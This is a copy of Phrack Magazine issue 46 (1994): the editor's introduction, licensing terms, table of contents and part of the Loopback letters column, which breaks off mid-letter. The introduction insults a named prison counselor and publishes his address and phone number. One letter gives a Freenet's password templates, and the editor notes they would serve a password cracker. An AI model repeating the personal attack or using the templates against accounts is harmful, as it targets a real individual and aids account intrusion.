22778 lines
973 KiB
Plaintext
22778 lines
973 KiB
Plaintext
![]() |
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 1 of 28
|
|||
|
|
|||
|
Issue 46 Index
|
|||
|
___________________
|
|||
|
|
|||
|
P H R A C K 4 6
|
|||
|
|
|||
|
September 20, 1994
|
|||
|
___________________
|
|||
|
|
|||
|
"La cotorra que chi, no canta"
|
|||
|
|
|||
|
Honey, I'm home! Anyway, like the little proverb above indicates, I've
|
|||
|
been a very busy man since the last issue. I've been denied entry to
|
|||
|
a federal prison in North Carolina (imagine the irony of THAT); I've
|
|||
|
been whoring in the Red-Light District of Amsterdam with military
|
|||
|
intelligence officers from England, Spain and the US; estuve chicaito en
|
|||
|
Nuevo Lardeo; I've tested wireless networks in Canada; and I've been
|
|||
|
on TV a few more times. (No, nimrod, Phrack is not my job...I WORK
|
|||
|
for a living.)
|
|||
|
|
|||
|
Needless to say, it has been a chore for me to get Phrack out at all,
|
|||
|
much less only a month or so past my self-imposed quarterly deadline.
|
|||
|
But hell, I love doing this magazine, so here it is. Phrack is the only
|
|||
|
way I can completely thrill and simultaneously piss off so many people
|
|||
|
at once, so I don't think I'll stop any time soon.
|
|||
|
|
|||
|
Pissing people off. It's what I like to do, and it would appear that
|
|||
|
I'm quite good at it. I realize that there are several extremely
|
|||
|
vocal erikb-bashers out there. And to them I say, "smooches!"
|
|||
|
Let's face it, sour grapes make bad whiners. But hey, "As long as they're
|
|||
|
talking about Erikb, let 'em talk." (Sorry Mr. Ford)
|
|||
|
|
|||
|
Besides piecing together this issue, I've been working on getting
|
|||
|
the WWW pages together. They still aren't 100%, but they are getting
|
|||
|
there. By the time I finally get them together, the Phrack
|
|||
|
Web Site should be the ultimate underground resource on the net.
|
|||
|
Check it out: http://freeside.com/phrack.html
|
|||
|
|
|||
|
You may be interested in the federal prison remark from the first
|
|||
|
paragraph. I had a meeting at IBM out in Research Triangle Park. I
|
|||
|
figured that this would be an ideal time to go see Co/Dec who still has
|
|||
|
several years of federal time left to serve. Co/Dec is in
|
|||
|
the Federal Correctional Institute at Butner, North Carolina, a short
|
|||
|
30 or so minutes from where I was staying in RTP.
|
|||
|
|
|||
|
Anyway, I receive the necessary forms from Co/Dec to get on the approved
|
|||
|
visitors list, and sent them back in. After several weeks, Co/Dec said
|
|||
|
that I still had not been added. My trip was slated for a week away, so
|
|||
|
I called his counselor, Wilbert LeMay. Mr. LeMay told me that he never got
|
|||
|
my forms. I then fed-ex'ed a copy (that I luckily had kept). It arrived
|
|||
|
on Friday morning, and I was to arrive on Monday. Mr. LeMay had assured me
|
|||
|
that it would be no problem to get me added to Co/Dec's list.
|
|||
|
|
|||
|
When I arrived on Monday, I called the prison to make sure the visit had
|
|||
|
been cleared. Mr. LeMay would not return my calls. In fact, not only
|
|||
|
would he not return any of the 5 or so calls I made, but he didn't even
|
|||
|
bother to enter my name on the visitor list until the Wednesday after I
|
|||
|
had already left North Carolina.
|
|||
|
|
|||
|
I'm sorry, but this man must be a real prick.
|
|||
|
|
|||
|
A bit of background on LeMay. First off, according to those on the inside,
|
|||
|
LeMay dislikes white people. He supposedly keeps a picture of slaves
|
|||
|
picking cotton on his desk as a constant reminder of the oppression his
|
|||
|
people were subjected to. But perhaps working in the prison system where
|
|||
|
you have constant view of the Aryan Brotherhood in action, I'm sure many
|
|||
|
would begin to feel likewise. (Can't we all just get along?) Secondly,
|
|||
|
LeMay dislikes Co/Dec. He put Co/Dec in solitary confinement for weeks
|
|||
|
because Co/Dec had a DOS MANUAL! A fucking DOS MANUAL! You do not
|
|||
|
put someone in the fucking hole for brushing up on the syntax for xcopy!
|
|||
|
You put them in the hole for inciting a fucking shank war, or for stealing
|
|||
|
food, or for punching a guard. Later, Co/Dec found himself in solitary
|
|||
|
confinement AGAIN because he traded some smokes for telephone parts he was
|
|||
|
going to use to fix a radio. The hole again. Not for weapons and drugs,
|
|||
|
NO! Much worse: wires and a speaker!
|
|||
|
|
|||
|
The prison now considers Co/Dec a security risk, and read all OUTGOING
|
|||
|
mail he sends. Not just the regular reading of all incoming mail
|
|||
|
that any inmate would expect. He can't take any clases, he's had
|
|||
|
several more days added to his sentence for "bad time served,"
|
|||
|
and in addition, all of his phone calls are live monitored and recorded.
|
|||
|
(A funny note, during one conversation I found that my touchtones would
|
|||
|
control the equipment they were using to record the call. The equipment
|
|||
|
they were using was improperly connected and gave off a terrible hum
|
|||
|
when activated. I kept turning off the recording, and the security
|
|||
|
officer kept having to turn it back on.)
|
|||
|
|
|||
|
All of this, due to Counselor Wilbert LeMay. Thanks guy.
|
|||
|
|
|||
|
If someone can so grossly abuse their power to completely remove the
|
|||
|
dignity of another human being, inmate or otherwise, that person needs
|
|||
|
to face severe disciplinary action. I'm writing the warden. Directory
|
|||
|
Assistance says that Wilbert can be reached at:
|
|||
|
|
|||
|
Wilbert LeMay
|
|||
|
701 East E St.
|
|||
|
Butner, NC 27509
|
|||
|
919-575-6375
|
|||
|
|
|||
|
Fun fact: Butner is serviced by GTE.
|
|||
|
|
|||
|
You know, its pretty odd that as hackers, we probably know a larger number
|
|||
|
of ex-cons and current inmates than most people.
|
|||
|
|
|||
|
But anyway, on to Phrack.
|
|||
|
|
|||
|
This issue is pretty odd in that "The Man" has consented to write
|
|||
|
a few syllables for us to distribute. Yes, Winn Schwartau submitted
|
|||
|
his unique perspectives of Defcon and HOPE. It's funny how many people
|
|||
|
left Defcon this year and ran home to find information on HIRF weapons
|
|||
|
after hearing Winn speak. (If you've actually built one by now, email
|
|||
|
me.)
|
|||
|
|
|||
|
What else? GS1, Pagers, Voice Mail, VisaNet, Area 51, Programs,
|
|||
|
Conferences, and an incomplete university dialup list. (Putting out
|
|||
|
an incomplete list really irritates me, but hell, its taking a LOT
|
|||
|
longer than I expected to get some 1300 dialups without more help.
|
|||
|
AHEM!)
|
|||
|
|
|||
|
Can you dig it? I knew that you could.
|
|||
|
|
|||
|
-------------------------------------------------------------------------
|
|||
|
|
|||
|
READ THE FOLLOWING
|
|||
|
|
|||
|
IMPORTANT REGISTRATION INFORMATION
|
|||
|
|
|||
|
Corporate/Institutional/Government: If you are a business,
|
|||
|
institution or government agency, or otherwise employed by,
|
|||
|
contracted to or providing any consultation relating to computers,
|
|||
|
telecommunications or security of any kind to such an entity, this
|
|||
|
information pertains to you.
|
|||
|
|
|||
|
You are instructed to read this agreement and comply with its
|
|||
|
terms and immediately destroy any copies of this publication
|
|||
|
existing in your possession (electronic or otherwise) until
|
|||
|
such a time as you have fulfilled your registration requirements.
|
|||
|
A form to request registration agreements is provided
|
|||
|
at the end of this file. Cost is $100.00 US per user for
|
|||
|
subscription registration. Cost of multi-user licenses will be
|
|||
|
negotiated on a site-by-site basis.
|
|||
|
|
|||
|
Individual User: If you are an individual end user whose use
|
|||
|
is not on behalf of a business, organization or government
|
|||
|
agency, you may read and possess copies of Phrack Magazine
|
|||
|
free of charge. You may also distribute this magazine freely
|
|||
|
to any other such hobbyist or computer service provided for
|
|||
|
similar hobbyists. If you are unsure of your qualifications
|
|||
|
as an individual user, please contact us as we do not wish to
|
|||
|
withhold Phrack from anyone whose occupations are not in conflict
|
|||
|
with our readership.
|
|||
|
|
|||
|
_______________________________________________________________
|
|||
|
|
|||
|
Phrack Magazine corporate/institutional/government agreement
|
|||
|
|
|||
|
Notice to users ("Company"): READ THE FOLLOWING LEGAL
|
|||
|
AGREEMENT. Company's use and/or possession of this Magazine is
|
|||
|
conditioned upon compliance by company with the terms of this
|
|||
|
agreement. Any continued use or possession of this Magazine is
|
|||
|
conditioned upon payment by company of the negotiated fee
|
|||
|
specified in a letter of confirmation from Phrack Magazine.
|
|||
|
|
|||
|
This magazine may not be distributed by Company to any
|
|||
|
outside corporation, organization or government agency. This
|
|||
|
agreement authorizes Company to use and possess the number of copies
|
|||
|
described in the confirmation letter from Phrack Magazine and for which
|
|||
|
Company has paid Phrack Magazine the negotiated agreement fee. If
|
|||
|
the confirmation letter from Phrack Magazine indicates that Company's
|
|||
|
agreement is "Corporate-Wide", this agreement will be deemed to cover
|
|||
|
copies duplicated and distributed by Company for use by any additional
|
|||
|
employees of Company during the Term, at no additional charge. This
|
|||
|
agreement will remain in effect for one year from the date of the
|
|||
|
confirmation letter from Phrack Magazine authorizing such continued use
|
|||
|
or such other period as is stated in the confirmation letter (the "Term").
|
|||
|
If Company does not obtain a confirmation letter and pay the applicable
|
|||
|
agreement fee, Company is in violation of applicable US Copyright laws.
|
|||
|
|
|||
|
This Magazine is protected by United States copyright laws and
|
|||
|
international treaty provisions. Company acknowledges that no title to
|
|||
|
the intellectual property in the Magazine is transferred to Company.
|
|||
|
Company further acknowledges that full ownership rights to the Magazine
|
|||
|
will remain the exclusive property of Phrack Magazine and Company will
|
|||
|
not acquire any rights to the Magazine except as expressly set
|
|||
|
forth in this agreement. Company agrees that any copies of the
|
|||
|
Magazine made by Company will contain the same proprietary
|
|||
|
notices which appear in this document.
|
|||
|
|
|||
|
In the event of invalidity of any provision of this agreement,
|
|||
|
the parties agree that such invalidity shall not affect the validity
|
|||
|
of the remaining portions of this agreement.
|
|||
|
|
|||
|
In no event shall Phrack Magazine be liable for consequential, incidental
|
|||
|
or indirect damages of any kind arising out of the delivery, performance or
|
|||
|
use of the information contained within the copy of this magazine, even
|
|||
|
if Phrack Magazine has been advised of the possibility of such damages.
|
|||
|
In no event will Phrack Magazine's liability for any claim, whether in
|
|||
|
contract, tort, or any other theory of liability, exceed the agreement fee
|
|||
|
paid by Company.
|
|||
|
|
|||
|
This Agreement will be governed by the laws of the State of Texas
|
|||
|
as they are applied to agreements to be entered into and to be performed
|
|||
|
entirely within Texas. The United Nations Convention on Contracts for
|
|||
|
the International Sale of Goods is specifically disclaimed.
|
|||
|
|
|||
|
This Agreement together with any Phrack Magazine
|
|||
|
confirmation letter constitute the entire agreement between
|
|||
|
Company and Phrack Magazine which supersedes any prior agreement,
|
|||
|
including any prior agreement from Phrack Magazine, or understanding,
|
|||
|
whether written or oral, relating to the subject matter of this
|
|||
|
Agreement. The terms and conditions of this Agreement shall
|
|||
|
apply to all orders submitted to Phrack Magazine and shall supersede any
|
|||
|
different or additional terms on purchase orders from Company.
|
|||
|
|
|||
|
_________________________________________________________________
|
|||
|
|
|||
|
REGISTRATION INFORMATION REQUEST FORM
|
|||
|
|
|||
|
|
|||
|
We have approximately __________ users.
|
|||
|
|
|||
|
Enclosed is $________
|
|||
|
|
|||
|
We desire Phrack Magazine distributed by (Choose one):
|
|||
|
|
|||
|
Electronic Mail: _________
|
|||
|
Hard Copy: _________
|
|||
|
Diskette: _________ (Include size & computer format)
|
|||
|
|
|||
|
|
|||
|
Name:_______________________________ Dept:____________________
|
|||
|
|
|||
|
Company:_______________________________________________________
|
|||
|
|
|||
|
Address:_______________________________________________________
|
|||
|
|
|||
|
_______________________________________________________________
|
|||
|
|
|||
|
City/State/Province:___________________________________________
|
|||
|
|
|||
|
Country/Postal Code:___________________________________________
|
|||
|
|
|||
|
Telephone:____________________ Fax:__________________________
|
|||
|
|
|||
|
|
|||
|
Send to:
|
|||
|
|
|||
|
Phrack Magazine
|
|||
|
603 W. 13th #1A-278
|
|||
|
Austin, TX 78701
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
Enjoy the magazine. It is for and by the hacking community. Period.
|
|||
|
|
|||
|
|
|||
|
Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
|
|||
|
3L33t : Ice-9 (for helping me get this done!)
|
|||
|
Rad Band : Green Day
|
|||
|
News : Datastream Cowboy
|
|||
|
Photography : The Man
|
|||
|
Prison Consultant : Co / Dec
|
|||
|
The Young Girl : Jane March
|
|||
|
Motor Trend's Car
|
|||
|
of the Year : The 2600 Van
|
|||
|
Dickhead of the Month : Wilbert LeMay at FCI Butner
|
|||
|
Thanks To : Szechuan Death, Carl Corey, The Shining, Dcypher
|
|||
|
Hitman Italy, Herd Beast, Dr. Delam, Maldoror,
|
|||
|
The Red Skull, PsychoSpy, Seven Up, Erudite, Ice Jey
|
|||
|
Special Thanks To : Winn Schwartau
|
|||
|
|
|||
|
Phrack Magazine V. 5, #46, September 20, 1994. ISSN 1068-1035
|
|||
|
Contents Copyright (C) 1994 Phrack Magazine, all rights reserved.
|
|||
|
Nothing may be reproduced in whole or in part without written
|
|||
|
permission of the Editor-In-Chief. Phrack Magazine is made available
|
|||
|
quarterly to the amateur computer hobbyist free of charge. Any
|
|||
|
corporate, government, legal, or otherwise commercial usage or
|
|||
|
possession (electronic or otherwise) is strictly prohibited without
|
|||
|
prior registration, and is in violation of applicable US Copyright laws.
|
|||
|
To subscribe, send email to phrack@well.sf.ca.us and ask to be added to
|
|||
|
the list.
|
|||
|
|
|||
|
Phrack Magazine
|
|||
|
603 W. 13th #1A-278 (Phrack Mailing Address)
|
|||
|
Austin, TX 78701
|
|||
|
|
|||
|
freeside.com (Phrack FTP Site)
|
|||
|
/pub/phrack
|
|||
|
|
|||
|
http://freeside.com/phrack.html (Phrack WWW Home Page)
|
|||
|
|
|||
|
phrack@well.sf.ca.us (Phrack E-mail Address)
|
|||
|
or phrackmag on America Online
|
|||
|
|
|||
|
Submissions to the above email address may be encrypted
|
|||
|
with the following key : (Not that we use PGP or encourage its
|
|||
|
use or anything. Heavens no. That would be politically-incorrect.
|
|||
|
Maybe someone else is decrypting our mail for us on another machine
|
|||
|
that isn't used for Phrack publication. Yeah, that's it. :) )
|
|||
|
|
|||
|
** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED **
|
|||
|
|
|||
|
Phrack goes out plaintext...you certainly can subscribe in plaintext.
|
|||
|
|
|||
|
-----BEGIN PGP PUBLIC KEY BLOCK-----
|
|||
|
Version: 2.3a
|
|||
|
|
|||
|
mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
|
|||
|
ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
|
|||
|
a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
|
|||
|
tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
|
|||
|
=q2KB
|
|||
|
|
|||
|
-----END PGP PUBLIC KEY BLOCK-----
|
|||
|
|
|||
|
|
|||
|
-= Phrack 46 =-
|
|||
|
Table Of Contents
|
|||
|
~~~~~~~~~~~~~~~~~
|
|||
|
1. Introduction by The Editor 17 K
|
|||
|
2. Phrack Loopback / Editorial 52 K
|
|||
|
3. Line Noise 61 K
|
|||
|
4. Line Noise 56 K
|
|||
|
5. Phrack Prophile on Minor Threat 12 K
|
|||
|
6. Paid Advertisement 62 K
|
|||
|
7. Paid Advertisement (cont) 45 K
|
|||
|
8. The Wonderful World of Pagers by Erik Bloodaxe 24 K
|
|||
|
9. Legal Info by Szechuan Death 13 K
|
|||
|
10. A Guide to Porno Boxes by Carl Corey 13 K
|
|||
|
11. Unix Hacking - Tools of the Trade by The Shining 42 K
|
|||
|
12. The fingerd Trojan Horse by Hitman Italy 32 K
|
|||
|
13. The Phrack University Dialup List 12 K
|
|||
|
14. A Little About Dialcom by Herd Beast 29 K
|
|||
|
15. VisaNet Operations Part I by Ice Jey 50 K
|
|||
|
16. VisaNet Operations Part II by Ice Jey 44 K
|
|||
|
17. Gettin' Down 'N Dirty Wit Da GS/1 by Maldoror & Dr. Delam 25 K
|
|||
|
18. Startalk by The Red Skull 21 K
|
|||
|
19. Cyber Christ Meets Lady Luck Part I by Winn Schwartau 45 K
|
|||
|
20. Cyber Christ Meets Lady Luck Part II by Winn Schwartau 42 K
|
|||
|
21. The Groom Lake Desert Rat by PsychoSpy 44 K
|
|||
|
22. HOPE by Erik Bloodaxe 51 K
|
|||
|
23. Cyber Christ Bites the Big Apple by Winn Schwartau 60 K
|
|||
|
24. The ABCs of Better Hotel Staying by Seven Up 12 K
|
|||
|
25. AT&T Definity System 75/85 by Erudite 13 K
|
|||
|
26. Keytrap v1.0 Keyboard Key Logger by Dcypher 35 K
|
|||
|
27. International Scenes by Various Sources 44 K
|
|||
|
28. Phrack World News by Datastream Cowboy 38 K
|
|||
|
|
|||
|
Total: 996 K
|
|||
|
|
|||
|
_______________________________________________________________________________
|
|||
|
|
|||
|
"Most hackers would have sold out their mother."
|
|||
|
Justin Tanner Peterson
|
|||
|
|
|||
|
"Treason is loved of many but the traitor hated of all."
|
|||
|
Robert Greene (1552-1592)
|
|||
|
|
|||
|
"They smile in your face, but all the while they want to take your place."
|
|||
|
The O'Jays
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 2 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
Phrack Loopback
|
|||
|
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
I'd like to write you about my friends cat. His name is 'Cid. Cid
|
|||
|
loves reading, in fact he'll read just about anything, from the labels on
|
|||
|
his cat food tins to the instructions on the "real" use of his Grafix
|
|||
|
(incense burner :) ). Well one take, 'Cid (or was it me) was indulging
|
|||
|
in the reason he got his moniker and mentioned that he'd like to receive
|
|||
|
Phrack. Well i told him he could just subscribe to it and then he went
|
|||
|
into a real sob story about how he doesn't have net access. So as a
|
|||
|
favor to 'Cid (who really does exist, and really has tripped out on brain
|
|||
|
blotters) i'd like to subscribe to Phrack.
|
|||
|
|
|||
|
[You my want to take note that Phrack can also be printed on paper.
|
|||
|
Now, that's a lot of blotter.
|
|||
|
|
|||
|
You've got your subscription, now go watch some anime.]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
I recently got a new job and shortly after beginning working there, they
|
|||
|
decided to retool and reorganize a bit for better productivity.
|
|||
|
|
|||
|
While we were going through some old boxes and stuff, I came across a
|
|||
|
little black box with the words "Demon Dialer" molded into the front of
|
|||
|
it, it even had the (functional!) 20volt power supply.
|
|||
|
|
|||
|
Needless to say I was pretty happy with my find. I asked if I could have
|
|||
|
it and since no one else there seemed to know what to make of it, mine it
|
|||
|
was!
|
|||
|
|
|||
|
My only problem now... I've played around with it, and it seems to do a
|
|||
|
lot more than what I originally thought, but the fact of the matter is..
|
|||
|
I really haven't the foggiest idea of how to get it to REALLY work for me.
|
|||
|
|
|||
|
If anyone has any information, or better still, actual documentation for
|
|||
|
a Telephonics Inc, Demon Dialer.. I'd really appreciate passing it on to me.
|
|||
|
|
|||
|
Also, something rater strange. The phone cable attached to it had a
|
|||
|
normal looking 4-wire connector on one end, but the other was split to
|
|||
|
have RJ jacks, one with the yellow-black combo and one with the
|
|||
|
red-green. The split ends (sorry :)) were plugged into the WALL and
|
|||
|
PHONE jacks on the demon dialer. The purpose for this perplexes me since
|
|||
|
one's supposed to be input and one's supposed to be a passthrough for the
|
|||
|
phone to be plugged into.
|
|||
|
|
|||
|
Anyway, any info would be nice. Thanks guys.
|
|||
|
|
|||
|
[Telephonics was one of those odd telco device manufacturers back in the
|
|||
|
80's. They made the demon dialer (a speed dialing device), a
|
|||
|
two-line conference box, a divertor, etc. Essentially, they provided
|
|||
|
in hardware what the telco's were beginning to roll-out in software.
|
|||
|
|
|||
|
I think the line splitter you have was merely plugged into those
|
|||
|
two jacks for storage purposes. What that probably was for was to
|
|||
|
allow two lines to use the Demon Dialer. It was probably just reversed
|
|||
|
when your company boxed it so it wouldn't get lost.
|
|||
|
|
|||
|
I'm not sure if Telephonics is still in business. A good place to
|
|||
|
start looking for info would be comp.dcom.telecom or alt.dcom.telecom.
|
|||
|
Another good place may be Hello Direct (800-HI-HELLO). They used to
|
|||
|
do have Telephonics equipment available for mail-order.]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
I saw an ad for a book called "Secrets of a SuperHacker" by Knightmare.
|
|||
|
Supposedly it intersperses tales of his exploits with code and examples.
|
|||
|
I have big doubts, but have you heard anything good/bad about it?
|
|||
|
|
|||
|
[Your doubts are well founded. I got an advance copy of that book.
|
|||
|
Let's put it this way: does any book that contains over a dozen pages
|
|||
|
of "common passwords" sound like ground breaking material?
|
|||
|
|
|||
|
This book is so like "Out of the Inner Circle" that I almost wanted
|
|||
|
to believe Knightmare (Dennis Fiery) was really yet another
|
|||
|
alias for Bill Landreth. Imagine "Out of the Inner Circle" with
|
|||
|
about a hundred or more extra pages of adjectives and examples that
|
|||
|
may have been useful years back.
|
|||
|
|
|||
|
The Knightmare I knew, Tom in 602, whose bust by Gail Thackeray
|
|||
|
gave law enforcement a big buffer of the Black Ice Private BBS
|
|||
|
and help spark the infamous LOD Hacker Crackdown, certainly didn't
|
|||
|
have anything to do with this. In fact, the book has a kind of
|
|||
|
snide tone to it and is so clueless, that leads me to believe it
|
|||
|
may have been written by a cop or security type person looking to
|
|||
|
make a quick buck.
|
|||
|
|
|||
|
As far as source code, well, there is a sample basic program that
|
|||
|
tries to emulate a university login.
|
|||
|
|
|||
|
If you want a good book, go buy "Firewalls and Internet Security" by
|
|||
|
Cheswick and Bellovin.]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Hey Chris,
|
|||
|
|
|||
|
I'm sure you are under a constant avalanche of requests for certain files,
|
|||
|
so I might as well add to your frustration <grin>. I know of a program
|
|||
|
that supposedly tracks cellular phone frequencies and displays them on
|
|||
|
a cellmap. However, I don't know the name of the program or (obviously)
|
|||
|
where to find this little gem. I was wondering if you could possibly
|
|||
|
enlighten me on a way to acquire a program similar to the one I have
|
|||
|
described. I have developed some other methods of tracking locations
|
|||
|
of cellular calls. However my methods rely on a database and manually
|
|||
|
mapping cellular phones, this method is strictly low tech. Of course
|
|||
|
this would be for experimental use only, therefore it would not be used
|
|||
|
to actually track actual, restricted, radio spectrum signals. I wouldn't
|
|||
|
want the aether Gestapo pummeling our heads and necks.
|
|||
|
|
|||
|
[I don't know of anything that plots frequencies on a cellmap. How would
|
|||
|
you know the actual locations of cells for whatever city you may
|
|||
|
be in to plot them accurately?
|
|||
|
|
|||
|
There are a number of programs written to listen to forward channel messages
|
|||
|
and tell you when a call is going to jump to another channel. The cellular
|
|||
|
telephone experimenter's kit from Network Wizards has a lot of nice
|
|||
|
C source that will let you write your own programs that work with their
|
|||
|
interface to the OKI 900. I suppose you could get the FCC database
|
|||
|
CD-ROM for your state and make note of longitude and latitude of cell sites
|
|||
|
and make your own database for your city, and then make a truly
|
|||
|
visual representation of a cellmap and watch calls move from cell to cell.
|
|||
|
But I don't think there is such a thing floating around the underground
|
|||
|
at present.
|
|||
|
|
|||
|
Of course the carriers have this ability, and are more than happy to make
|
|||
|
it available to Law Enforcement (without a warrant mind you). Hi OJ!
|
|||
|
|
|||
|
email Mark Lottor mw@nw.com for more info about the CTEK.]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
I saw this in a HoHoCon ad:
|
|||
|
|
|||
|
Top Ten Nark List
|
|||
|
1. Traxxter
|
|||
|
2. Scott Chasin
|
|||
|
3. Chris Goggans
|
|||
|
4. Aget Steal
|
|||
|
5. Dale Drrew
|
|||
|
6. Cliff Stoll
|
|||
|
7. [blank]
|
|||
|
8. Julio Fernandez
|
|||
|
9. Scanman
|
|||
|
10. Cori Braun
|
|||
|
|
|||
|
What did Chris Goggans do? Isn't he Erik Bloodaxe, the publisher of
|
|||
|
Phrack? I sincerely doubt that the feds would have someone
|
|||
|
working for them that puts out a publication like Phrack. It would
|
|||
|
be way too much of an embarrassment for them. I wrote to the
|
|||
|
editor of Phrack when I read that Agent Steal said that the publisher
|
|||
|
of Phrack was a Fed - IN PHRACK no less. He said it was a stupid rumor.
|
|||
|
Is there anything to support this fact? And why is there now some manhunt for
|
|||
|
Agent Steal (at CFP the FBI was checking legs) if Steal was admittedly
|
|||
|
their employee? The whole thing is very confusing to me. Please explain.
|
|||
|
If Goggans isn't Bloodaxe then he'd Knight Lightning (this just came to me).
|
|||
|
Nevertheless, what's the story here?
|
|||
|
|
|||
|
[First off, I think you take things a little too seriously. If you are on
|
|||
|
a nark hunt, worry about your associates, not people you obviously
|
|||
|
don't even know. Chris Goggans (ME) is most positively Erik Bloodaxe.
|
|||
|
Thanks for remembering.
|
|||
|
|
|||
|
Agent Steal was involved with the FBI. This is a fact.
|
|||
|
In his case, he even appeared to have some kind of immunity while trying
|
|||
|
to gather information on other hackers like Mitnik and Poulsen. This
|
|||
|
immunity is under scrutiny by the Bureau's own Internal Affairs (or so the
|
|||
|
new rumors go), since Steal was pulling a fast one and committing crimes
|
|||
|
the Bureau didn't know about to get some quick cash while he set up his
|
|||
|
friends.
|
|||
|
|
|||
|
My story is a bit more convoluted. You can sum it up by saying, if you
|
|||
|
interfere with my businesses, I'll try my best to track you down and turn
|
|||
|
you in. I guess I am a nark.]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
I read in the last Phrack (45) that you wanted someone to write a few
|
|||
|
words on scrambling systems. Give me a rough outline of what you want
|
|||
|
and I'll see if I can help :-) Basically I wrote the Black Book
|
|||
|
(European Scrambling Systems 1,2,3,4,5 and World Satellite TV &
|
|||
|
Scrambling Methods) and also edit Hack Watch News & Syndicated
|
|||
|
HackWatch. They all deal with scrambling system hacks as opposed to
|
|||
|
computer hacking & phreaking. (Things are a bit iffy here as regards
|
|||
|
phreaking as all calls are logged but the eprom phone cards are easy
|
|||
|
to hack) Oh yeah and another claim to fame ;-) if you can call it
|
|||
|
that, is that I was quoted in an article on satellite piracy in
|
|||
|
"Wired" August issue.
|
|||
|
|
|||
|
This Hawkwind character that you had an article from in Phrack43
|
|||
|
sounds like a *real* hacker indeed :-> Actually there is an elite in
|
|||
|
Ireland but it is mainly concerned with satellite hacking and that
|
|||
|
Hawkwind character is obviously just a JAFA (Irish hacker expression
|
|||
|
- Just Another Fu**ing Amateur). Most of the advanced telco stuff is
|
|||
|
tested in the south of the country as Dublin is not really that
|
|||
|
important in terms of comms - most of the Atlantic path satellite
|
|||
|
comms gear and brains are on the south coast :-)
|
|||
|
|
|||
|
Actually the Hawkwind article really pissed off some people here in
|
|||
|
Ireland - there were a few questions asked on my own bbs (Special
|
|||
|
Projects +353-51-50143) about this character. I am not even sure if
|
|||
|
the character is a real hacker or just a wannabe - there were no
|
|||
|
responses from any of his addresses. SP is sort of like the neutral
|
|||
|
territory for satellite and cable hacking information in Europe
|
|||
|
though there are a few US callers. With the way things are going with
|
|||
|
your new DBS DirecTv system in the US, it looks like the European
|
|||
|
satellite hackers are going to be supplying a lot of information
|
|||
|
(DirecTv's security overlay was developed by News Datacom - the
|
|||
|
developers of the totally hacked VideoCrypt system here in Europe).
|
|||
|
|
|||
|
There telco here uses eprom phone cards. These are extremely easy to
|
|||
|
hack (well most real hackers in .IE work on breaking satellite
|
|||
|
scrambling systems that use smart cards) as they are only serial
|
|||
|
eprom.
|
|||
|
|
|||
|
Regards
|
|||
|
|
|||
|
[About the satellite information: YES! Write the biggest, best
|
|||
|
article the whole fucking hacker world has ever seen about
|
|||
|
every aspect of satellite tv!! Personally, I'm more interested in
|
|||
|
that than anything else anyone could possibly write (seeing as how
|
|||
|
I'm about to buy a dish for both C and Ku).
|
|||
|
|
|||
|
About Hawkwind's article on hacking in Ireland: If I were to write
|
|||
|
an article about hacking in America, it would be entirely different
|
|||
|
than anyone else in America would write. A country is a big place.
|
|||
|
Just because someone else's hacking experience is different than
|
|||
|
your own, it's no reason to discredit them. However, if your
|
|||
|
exposure to the scene in Ireland is so completely different than
|
|||
|
Hawkwind's, I would LOVE to print it as well.]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
The Columbus Freenet uses a password generating routine that takes the
|
|||
|
first and last initial of the user's real name, and inserts it into a randomly
|
|||
|
chosen template. Some of the templates are:
|
|||
|
|
|||
|
E(f)www5(l)
|
|||
|
(f)22ww5(l) where f and l are first and last initials
|
|||
|
(f)2ww97(l)
|
|||
|
(f)2ww95(l)
|
|||
|
|
|||
|
and so on. There are not too many of these templates, I guess maybe 50.
|
|||
|
I imagine most people go in and change their password right away, but
|
|||
|
then again that's what a prudent person would do (so they probably don't).
|
|||
|
|
|||
|
Columbus 2600 meetings:
|
|||
|
|
|||
|
Fungal Mutoid-sysop of The KrackBaby BBS (614-326-3933) organized the
|
|||
|
first 2600 meetings in Columbus, unfortunately hardly anyone shows up...
|
|||
|
I don't know why HP is so dead in Central Ohio, but fear and paranoia
|
|||
|
run rampant.
|
|||
|
That's all for now...keep up with the good work!
|
|||
|
|
|||
|
R.U.Serius?!
|
|||
|
|
|||
|
[Hmmm...templates are always a bad thing. All one has to do is get the
|
|||
|
program that generates them, and viola, you've got a pre-made dict file
|
|||
|
for your crack program. Not very smart on the part of the Freenet,
|
|||
|
but hacking a Freenet, is like kicking a puppy.
|
|||
|
|
|||
|
I hope more people go to your 2600 meetings. The ones here in Austin
|
|||
|
kinda died out too. Maybe our cities are just lame.]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
A complaint: That piece about McDonald's in Phrack 45 was, in a word, LAME.
|
|||
|
Surely Phrack can do better. Maliciousness for its own sake isn't very
|
|||
|
interesting and frankly the article didn't have any ideas that a bored
|
|||
|
13-year-old couldn't have thought up--probably written by one.
|
|||
|
|
|||
|
That aside, I found some good stuff in there. Some of it was old news,
|
|||
|
but Phrack serves an archival purpose too, so that was ok. On a more
|
|||
|
personal note, I could really relate to your account of HoHoCon--not that
|
|||
|
I was there, just that I have started to feel old lately even though I don't
|
|||
|
turn 25 for another 2 days :) Sometimes I feel myself saying things like
|
|||
|
